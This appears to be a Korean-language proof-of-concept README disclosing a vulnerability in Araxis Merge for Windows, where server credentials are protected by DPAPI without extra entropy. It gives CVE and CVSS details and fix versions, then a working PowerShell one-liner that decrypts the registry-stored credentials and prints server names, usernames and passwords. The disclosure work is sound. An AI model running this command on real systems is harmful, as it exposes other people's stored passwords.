
Araxis Merge의 DPAPI로 보호된 서버 자격 증명을 복호화하는 개념 증명(CVE-2026-92680)으로, Windows에서 불충분하게 보호된 자격 증명 저장을 보여줍니다.
Araxis Merge for Windows는 서버 자격 증명을 DPAPI로 저장하며, 이때 pOptionalEntropy가 NULL로 설정됩니다. 이로 인해 동일한 사용자 컨텍스트에서 실행되는 모든 코드가 자격 증명을 복호화할 수 있습니다.
전체 분석 글: https://grepstrength.com/research/araxis-merge
| CVE | CVE-2026-92680 |
| CWE | CWE-522: 불충분하게 보호된 자격 증명 |
| CVSS v3.1 | 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) |
| 공급업체 | Araxis Ltd. |
| 영향받는 버전 | Araxis Merge for Windows 2011.4074 ~ 2026.0 |
| 수정된 버전 | 2026.1 |
| 공급업체 권고 | Merge-SA-26-00 |
| 보고일 | 2026-08-18 |
| 공개일 | 2026-XX-XX |
| 보고자 | grepStrength |
다음은 HKCU\Software\Araxis\Merge\7.1\Passwords를 복호화하고 파싱합니다. 이는 원래 자격 증명을 저장한 것과 동일한 Windows 사용자로 실행되어야 합니다.
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize
모든 테스트는 grepStength Security가 소유한 시스템에서 합성 자격 증명만을 사용하여 수행되었습니다. 이는 Araxis Ltd.에 보고되었으며, 수정 사항이 제공된 후 공개적으로 공개되었습니다.
MIT